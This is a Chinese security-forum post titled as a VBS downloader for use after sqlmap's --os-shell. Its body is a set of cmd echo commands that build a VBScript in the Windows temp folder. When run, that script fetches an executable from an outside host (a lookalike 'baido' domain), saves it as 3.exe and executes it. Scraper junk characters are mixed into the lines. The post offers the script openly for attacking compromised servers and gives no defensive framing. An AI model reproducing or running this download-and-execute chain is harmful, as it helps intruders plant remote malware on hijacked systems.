找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1648|回复: 0

vbs下载者,适合sqlmap --os-shell使用

[复制链接]
发表于 2016-4-12 16:08:26 | 显示全部楼层 |阅读模式
echo ^Set Post = CreateObject("Msxml2.XMLHTTP")^ >>c:\windows\temp\666999.txt
; L+ ^% e8 n- T7 d) r/ `# S: zecho ^Set Shell = CreateObject("Wscript.Shell")^ >>c:\windows\temp\666999.txt
( @3 X+ a* j5 Gecho ^Post.Open "GET","http://www.baido.hk/server.exe",0^ >>c:\windows\temp\666999.txt! V# n: G  x6 a& T' H1 l; c* n
echo ^Post.Send()^ >>c:\windows\temp\666999.txt
9 t+ M% U: f; G: S8 h$ ~echo ^Set aGet = CreateObject("ADODB.Stream")^ >>c:\windows\temp\666999.txt, k; V8 q- N; ]5 w$ k/ T3 S
echo ^aGet.Mode = 3^ >>c:\windows\temp\666999.txt
$ R' j/ f3 J  F, hecho ^aGet.Type = 1^ >>c:\windows\temp\666999.txt
* M; k: p+ i3 Iecho ^aGet.Open()^ >>c:\windows\temp\666999.txt  A, u0 ^* P3 _6 L. P) \3 v
echo ^aGet.Write(Post.responseBody)^ >>c:\windows\temp\666999.txt3 _/ T4 |. j6 e! J$ g8 h* ^/ l5 s
echo ^aGet.SaveToFile "c:\windows\temp\3.exe",2^ >>c:\windows\temp\666999.txt, h" N" P- _! N& W% a" d2 y3 F
echo ^wscript.sleep 1000^ >>c:\windows\temp\666999.txt
0 V0 j+ E' u; D/ [+ u4 o  U& recho ^Shell.Run ("c:\windows\temp\3.exe")^ >>c:\windows\temp\666999.txt0 }$ I  H$ Q4 n( t9 s
5 j! G) }: w, t6 h! e* p, e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表